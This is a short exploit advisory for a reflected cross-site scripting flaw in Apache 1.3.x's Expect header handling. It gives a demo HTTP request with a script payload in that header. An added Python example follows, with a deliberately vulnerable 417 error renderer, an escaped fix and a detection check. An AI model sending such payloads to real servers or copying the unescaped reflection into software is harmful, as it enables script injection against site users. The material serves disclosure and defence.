
Apache/1.3.X (Expect) Header Inject

Author: Cold z3ro, Published: 10-01-2015
# Apache/1.3.X (Expect) Header Inject
# tested on Apache/1.3.34
# by Cold z3ro, www.hackteach.org | https://www.facebook.com/groups/hackteach.org

Expect
The Expect request-header field is used to indicate that particular server behaviors are required by the client.

# attack by adding an "Expect" header
demo header:

-----------------------------------------
GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html
Accept-Language: en-US
Expect: <script> alert('HTLOVER') </script>
Connection: keep-alive
-----------------------------------------
POC (screenshots):
https://www.facebook.com/photo.php?fbid=891554550868724
https://www.facebook.com/photo.php?fbid=891554584202054
https://www.facebook.com/photo.php?fbid=891554517535394
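The demo header above works because Apache 1.3.x echoed an unrecognised Expect value back into its 417 "Expectation Failed" HTML error page without escaping it. The following Python script is an added example, not code from the advisory or from Apache: it parses the demo request, models the unescaped reflection beside a hardened renderer that HTML-escapes the value, and includes a check a defender can run against captured responses to tell the two behaviours apart. The 417 error text is an approximation of Apache's wording, and the request is constructed from the header shown above.

```python
"""Added example (not part of the original advisory): models the reflected
Expect-header flaw in Apache 1.3.x's 417 error page and its hardened form."""
import html

# Constructed request, mirroring the demo header in the advisory.
DEMO_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0\r\n"
    "Accept: text/html\r\n"
    "Accept-Language: en-US\r\n"
    "Expect: <script> alert('HTLOVER') </script>\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

# Approximation of the Apache 1.3 417 page; the {value} slot is where the
# client-supplied Expect value is interpolated.
ERROR_417_TEMPLATE = (
    "<HTML><HEAD><TITLE>417 Expectation Failed</TITLE></HEAD><BODY>"
    "<H1>Expectation Failed</H1>The expectation given in the Expect "
    "request-header field could not be met by this server.<P>The client sent"
    "<PRE>Expect: {value}</PRE>but we only support the 100-continue "
    "expectation.</BODY></HTML>"
)


def parse_headers(raw: str) -> dict:
    """Parse a raw HTTP/1.1 request head into a lower-cased header dict."""
    head, _, _ = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def error_417_vulnerable(expect_value: str) -> str:
    """Flawed behaviour: the raw Expect value lands in the HTML unescaped."""
    return ERROR_417_TEMPLATE.format(value=expect_value)


def error_417_hardened(expect_value: str) -> str:
    """Fixed behaviour: the value is HTML-escaped before interpolation."""
    return ERROR_417_TEMPLATE.format(value=html.escape(expect_value, quote=True))


def handle_request(raw: str, render=error_417_hardened):
    """Return (status, body). Only '100-continue' is a supported expectation;
    any other Expect value yields a 417 rendered by the chosen renderer."""
    headers = parse_headers(raw)
    expect = headers.get("expect")
    if expect is None or expect.lower() == "100-continue":
        return 200, "<HTML><BODY>ok</BODY></HTML>"
    return 417, render(expect)


def reflects_unescaped(expect_value: str, body: str) -> bool:
    """Detection check for a captured response: True when a value containing
    markup characters appears verbatim in the body, i.e. it was not escaped."""
    has_markup = any(c in expect_value for c in "<>\"'")
    return has_markup and expect_value in body


if __name__ == "__main__":
    value = parse_headers(DEMO_REQUEST)["expect"]
    for name, renderer in (("vulnerable", error_417_vulnerable),
                           ("hardened", error_417_hardened)):
        status, body = handle_request(DEMO_REQUEST, renderer)
        print(f"{name}: status={status} reflected_unescaped="
              f"{reflects_unescaped(value, body)}")
```

The `reflects_unescaped` check is the useful part for a defender reviewing a proxy capture or a test against their own server: a 417 response that contains the raw `<script>` marker verbatim shows the flawed behaviour, while the hardened renderer returns `&lt;script&gt;` and the check stays false.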
